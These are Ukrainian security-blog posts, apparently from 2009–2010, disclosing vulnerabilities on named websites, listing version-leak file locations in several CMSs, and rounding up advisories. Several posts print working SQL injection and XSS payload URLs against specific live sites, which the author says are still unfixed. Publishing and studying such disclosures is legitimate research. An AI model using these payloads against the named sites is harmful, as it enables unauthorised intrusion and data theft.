Websecurity - Веб безпека

29.08.2009

У січні, 09.01.2009, я знайшов Full path disclosure, Insufficient Anti-automation та Cross-Site Scripting уразливості на проекті http://zhelem.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.03.2010

Full path disclosure:

http://zhelem.com/cgi-bin/nb/admin/index.php?lang=1

http://zhelem.com/cgi-bin/nb/admin/pwlost.php?lang=1

http://zhelem.com/cgi-bin/nb/admin/usered.php?lang=1&mode=comment&input_entrynr=44&entrylang=en

Insufficient Anti-automation:

http://zhelem.com/cgi-bin/nb/admin/usered.php?lang=en&mode=comment&input_entrynr=44&entrylang=en

Логін і пароль фіксовані та задані на сторінці.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

У серпні, 18.08.2009, я виявив Cross-Site Request Forgery, Full path disclosure та Denial of Service уразливості в Mantis (MantisBT). Уразливості виявив на одному сайті, який використовує дану систему. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

В даній добірці уразливості в веб додатках:

• EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability (деталі)
• EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability (деталі)
• EMC Dantz Retrospect 7 backup Server Authentication Module Weak Password Hash Arithmetic Vulnerability (деталі)
• EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer reference Denial of Service Vulnerability (деталі)
• Jetty Persistent XSS in Sample Cookies Application (деталі)
• Remote File Inclusion In AIOCP (деталі)
• IronPort Encryption Appliance / PostX and PXE Encryption Vulnerabilities (деталі)
• Docebo Multiple SQL-Injection Vulnerabilities (деталі)
• vBulletin - Multiple Versions - Cross Site Script Redirection (деталі)
• DreamPoll 3.1 Vulnerabilities (деталі)

10.07.2009

У жовтні, 01.10.2008, я знайшов SQL Injection, SQL DB Structure Extraction та Cross-Site Scripting уразливості на проекті http://www.a-counter.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливість на www.a-counter.com.

Детальна інформація про уразливості з’явиться пізніше.

06.03.2010

SQL Injection:

http://www.a-counter.com/cgi-bin/ratecat?code=%22'%20or%20version()=4.1%20or%201='

SQL DB Structure Extraction:

http://www.a-counter.com/cgi-bin/ratecat?code=’%221

XSS:

• alert(’XSS’)

Уразливості досі не виправлені.

Як я нещодавно згадував, в цьому році житель Луцька дістав базу даних Укртелекома і намагався її продати, після чого був пійманий міліцією. При тому, що подібні диски з Базою 09 продаються в Україні вже багато років, зокрема в Києві. Тому Укртелеком сам постійно створює подібні витоки даних, що й дозволяє створювати подібні БД та поширювати їх на компакт дисках.

І раніше я вже писав про уразливість на сайті Укртелекома, що дозволяє отримати всі дані з їхньої БД (в тому числі потенційно й ті, яких не знайдеш в Базі 09). Так що можливість витоків даних від Укртелекома цілком зрозуміла.

Нещодавно, 21.02.2010, досліджуючи це питання за Базою 09, я зайшов на http://www.kyiv.ukrtelecom.ua і виявив Information Leakage уразливість. Що призводить до витоку даних про абонентів Укртелекома.

В своїй онлайновій базі Служба 109, Укртелеком видає забагато інформації. Він видає не тільки телефон, але й призвіще, ініціали (невірно) і вулицю (без дома і квартири). При цьому дозволяє використовувати wildcard-символи.

Хоча сам заявляє про “пошук телефону абонентів квартирного сектору”, тобто повинен тільки телефони видавати. Тобто він дає завеликий витік інформації. За допомогою даного сервісу можна знайти забагато інформації, навіть не маючи Бази 09.

Продовжу тему витоку інформації про версію системи. Як я зазначав, виведення версії системи - це поширена функція у веб додатках та веб системах. Багато різних движків виводять інформацію про версію системи і дана можливість движків є уразливістю. Це витік інформації (Information Leakage) про версію системи, що може бути використаний для атаки на сайти, що використовують даний движок.

Наведу нові приклади Information Leakage уразливостей в різних веб додатках, що приводять до витоку інформації про версію системи.

Mambo

В Mambo є декілька витоків інформації:

• На сторінці адмінки http://site/administrator/ виводиться (у вигляді зображення) версія системи (4.5.2).
• В фідах (http://site/index2.php?option=com_rss&feed=RSS0.91, http://site/index2.php?option=com_rss&feed=RSS1.0, http://site/index2.php?option=com_rss&feed=RSS2.0, http://site/index2.php?option=com_rss&feed=ATOM0.3) виводиться версія (Mambo 4.5.2).
• В файлах /css/admin.css, /docs/Manual_Installation.html, /docs/Changelog.txt або /CHANGELOG (в різних версіях) та /sql/*.sql або /installation/sql/*.sql (в різних версіях).

MODx

В MODx є декілька витоків інформації:

• На сторінці адмінки http://site/manager/ вказані роки копірайту “2005-2008″, з чого можна визначити приблизну версію системи.
• В файлах /install/changelog.txt та /install/setup.sql.

phpAdsNew

В phpAdsNew є декілька витоків інформації:

• В мета-тезі в адмінці виводиться версія системи (phpAdsNew 2.0.8).
• В файлах /README та /misc/ChangeLog.

OpenAds

В OpenAds є декілька витоків інформації:

• В мета-тезі в адмінці (http://site/www/admin/) виводиться версія системи (Openads v2.4).
• В файлах /README.txt та /misc/ChangeLog.txt.

OpenX

В OpenX є декілька витоків інформації:

• В мета-тезі в адмінці (http://site/www/admin/) виводиться версія системи (OpenX v2.8.3).
• В файлах /README.txt, /RELEASE_NOTES.txt, /TRANSLATIONS.txt (неповна версія), /UPGRADE.txt (неповна версія) та /docs/KNOWN_ISSUES.txt (неповна версія).

В даній добірці уразливості в веб додатках:

• LightBlog Remote File Upload Vulnerability (деталі)
• LiveCart XSS vulnerability fixed since version 1.1.0 (деталі)
• sflog! 0.96 remote file disclosure vulnerabilities (деталі)
• phpShop <= v 0.8.1 Remote SQL injection / Filter Bypass (деталі)
• WowWee Rovio - Insufficient Access Controls - Covert Audio/Video Snooping Possible (деталі)
• New gnome-peercast packages fix several vulnerabilities (деталі)
• New peercast packages fix arbitrary code execution (деталі)
• Heap overflow in PeerCast 0.1217 (деталі)
• Hyperic HQ Multiple XSS (деталі)
• XSS in Blackberries Mobile Data Service Connection Service (деталі)

24.08.2009

У січні, 03.01.2009, я знайшов SQL Injection, SQL DB Structure Extraction та Full path disclosure уразливості на проекті http://www.findthatfile.com (пошукова система). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

04.03.2010

SQL Injection:

http://www.findthatfile.com/?q=test&mediaselect='%20and%20benchmark(10000,md5(now()))%20and%201='1

SQL DB Structure Extraction:

http://www.findthatfile.com/?q=test&mediaselect=’

Full path disclosure:

http://www.findthatfile.com/?q=test&mediaselect=’%20a()

Виправлена лише Full path disclosure уразливість. Всі інші уразливості досі не виправлені. В SQL Injection виправлений лише вектор атаки з benchmark, але можливі інші атаки на select запит, а також атаки на запити insert та update.

У липні, 26.07.2009, досліджуючи експлоіт для DoS уразливоті в findText в IE7 та IE8 (розроблений Hong10), я виявив, що даний експлоіт також працює в IE6. Тобто це Denial of Service уразливість в Microsoft Internet Explorer 6, 7 і 8.

DoS:

IE DoS Exploit.html

При запуску експлоіта браузер вилітає.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) і попередні версії. А також, за повідомленням автора, IE7 та IE8.

В даній добірці уразливості в веб додатках:

• STEAM (Valve) - Phishing and Cross-site Scripting in internal browser (деталі)
• PBBoard <=2.0.2 - XSS in Topic (деталі)
• PBBoard <=2.0.2 Full Path Disclosure (деталі)
• Palm Pre WebOS <=1.1 Remote File Access Vulnerability (деталі)
• Hyperic HQ - Stored XSS in alerts list (деталі)
• Hyperic HQ - Reflected XSS in stack trace (деталі)
• New boinc packages fix validation bypass (деталі)
• New lasso packages fix validation bypass (деталі)
• Vulnerabilities in OpenSSL (деталі)
• Multiple OpenSSL signature verification API misuses (деталі)